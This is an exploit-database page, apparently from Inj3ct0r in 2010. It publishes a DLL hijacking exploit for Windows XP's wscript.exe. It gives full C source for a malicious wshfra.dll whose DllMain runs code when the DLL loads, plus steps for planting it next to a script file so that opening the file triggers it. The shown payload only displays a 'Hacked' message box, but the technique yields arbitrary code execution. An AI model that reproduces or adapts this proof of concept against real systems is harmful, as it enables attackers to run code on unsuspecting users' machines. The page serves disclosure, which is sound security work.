Home / os / win7

Microsoft Windows wscript.exe (XP) DLL Hijacking Exploit (ws

Posted on 27 August 2010

<!DOCTYPE HTML PUBLIC '-//W3C//DTD HTML 4.01 Transitional//EN'><html><head><meta http-equiv='Content-Type' content='text/html; charset=windows-1251'><title>Microsoft Windows wscript.exe (XP) DLL Hijacking Exploit (wshfra.dll)</title><link rel='shortcut icon' href='/favicon.ico' type='image/x-icon'><link rel='alternate' type='application/rss+xml' title='Inj3ct0r RSS' href='/rss'></head><body><pre>=====================================================================
Microsoft Windows wscript.exe (XP) DLL Hijacking Exploit (wshfra.dll)
=====================================================================

#Microsoft Windows wscript.exe (XP) DLL Hijacking Exploit (wshfra.dll)
#Author : Mohamed Clay
#Greetz : linuxac.org &amp;&amp; isecur1ty.org &amp;&amp; security4arabs.com &amp;&amp; v4-team.com &amp;&amp; all My Friends
#note : EveryOne is happy with DLL Hijacking YooooPiiii!!!!
#Tested on: Windows XP
#Vulnerable Extensions : js , jse , vbe , vbs , wsf ,wsh
#How to use : Place a vulnerable extensions file and wshfra.dll in same folder and execute the file .

#wshfra.dll(code)

===========================================

#include &quot;stdafx.h&quot;

void init() {
MessageBox(NULL,&quot;Mohamed Clay&quot;, &quot;Hacked&quot;,0x00000003);
}


BOOL APIENTRY DllMain( HANDLE hModule,
                       DWORD  ul_reason_for_call,
                       LPVOID lpReserved
 )
{
    switch (ul_reason_for_call)
{
case DLL_PROCESS_ATTACH:
 init();break;
case DLL_THREAD_ATTACH:
case DLL_THREAD_DETACH:
 case DLL_PROCESS_DETACH:
break;
    }
    return TRUE;
}

=============================================


# <a href='http://inj3ct0r.com/'>Inj3ct0r.com</a> [2010-08-27]</pre><script type='text/javascript'>var gaJsHost = (("https:" == document.location.protocol) ? "https://ssl." : "http://www.");document.write(unescape("%3Cscript src='" + gaJsHost + "google-analytics.com/ga.js' type='text/javascript'%3E%3C/script%3E"));</script><script type='text/javascript'>try{var pageTracker = _gat._getTracker("UA-12725838-1");pageTracker._setDomainName("none");pageTracker._setAllowLinker(true);pageTracker._trackPageview();}catch(err){}</script></body></html>

 

TOP

Malware :

Exploits :